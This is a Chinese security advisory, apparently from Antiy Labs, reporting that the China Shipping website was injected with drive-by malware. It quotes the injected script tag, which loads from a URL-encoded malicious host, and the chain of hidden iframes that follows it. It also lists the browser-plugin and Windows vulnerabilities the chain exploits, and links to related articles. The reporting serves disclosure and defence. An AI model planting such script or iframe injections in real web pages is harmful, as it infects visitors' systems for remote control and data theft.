中国航运网遭遇挂马 黑客悄悄植入病毒

简介: 中国航运网(hxxp://www.zhongguohangyun.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。

中国航运网(hxxp://www.zhongguohangyun.com/)被黑客植入病毒,用户如果访问该网页,系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。

该网站问题代码:

 

 

      
      <script src=hxxp://%6D%62%72%33%2E%63%6E></script>

hxxp://mbr3.cn/问题框架代码:

 

 

      
      <iframe src=hxxp://www.wansf.net/a11/a11.htm></iframe>

hxxp://www.wansf.net/a11/a11.htm问题框架代码:

 

 

      
      <iframe src=new.html  height=0  width=100 ></iframe>

hxxp://www.wansf.net/a11/new.html问题框架代码

 

该挂马网页通过以下几个漏洞进行传播:

联众世界GLWorld HanGamePluginCn18类ActiveX控件栈溢出漏洞

MS08-041漏洞

暴风影音2 mps.dll组件多个缓冲区溢出漏洞

MS06-014漏洞

Adobe Flash Player SWF文件漏洞

MS09-002漏洞

RealPlayer播放器IERPCtl.IERPCtl.1漏洞

百度搜霸ActiveX控件远程代码执行漏洞

【注:基于安全考虑,所有网络链接“http”均已被替换为“hxxp”,特此说明。】

【资料来源:安天实验室】

目录
相关文章
|
云安全 安全 开发工具
一觉醒来,小R的服务器被暴力破解,被植入挖矿程序?
一觉醒来,小R的服务器被暴力破解,被植入挖矿程序?
158 0
|
监控 安全 NoSQL
记一次服务器被挖矿木马攻击的经历
利用空余时间买了台服务器做了个小网站玩,今天访问了一下,加载巨慢,一看服务器运行情况,CPU飙到100%,按CPU消耗排序,排在第一的是一个名为“imWBR1”的进程,查了一下是一个挖矿木马,于是赶紧采取办法~
记一次服务器被挖矿木马攻击的经历
|
云安全 监控 安全
瑞星云安全截获新感染病毒 6月感染网民263万
近日,瑞星“云安全”系统截获了多个新型感染病毒,这些病毒具有多个特点:病毒感染能力强、可以释放多个木马程序、能够逃脱大部分杀毒软件的查杀与监控、变异速度快。当用户从网上下载一些流行MP3、exe、flash等文件时,其中很有可能带有此类病毒,用户运行后即可感染电脑中的其他文件。
1073 0
|
Web App开发 安全
警惕IE7新漏洞导致的木马病毒暴增
2月20日,瑞星公司发出2009年度第一个红色(一级)安全警报,因为针对IE7新漏洞(MS09-002)的病毒攻击代码在网上公布,导致利用该漏洞的新木马病毒大量出现。由于该类木马病毒的暴增,根据瑞星“云安全”系统的统计,仅在2月19日就截获了高达866万人次的挂马网站攻击,比前一天增加了一倍。
937 0
|
安全
新僵尸病毒侵袭全球 或为黑帮发动
据国外媒体报道,美国知名互联网安全公司NetWitness近日表示,一种新型的电脑病毒在过去一年半时间内已入侵全球2500家大型企业和政府机构内的7.5万台电脑,病毒将这些电脑构成了一个庞大而危险的“僵尸网络”,并从中窃取大量重要信息。
1149 0
|
监控 安全 数据安全/隐私保护
趋势科技再次发现无文件恶意攻击,攻击目标集中在亚洲
本文讲的是趋势科技再次发现无文件恶意攻击,攻击目标集中在亚洲,最近趋势科技的研究人员发现一个新的专门挖掘加密货币的无文件恶意攻击软件(被趋势科技检测为TROJ64_COINMINER.QO)。在七月份亚太地区的一些攻击中,研究人员第一次发现这个恶意攻击软件。
1442 0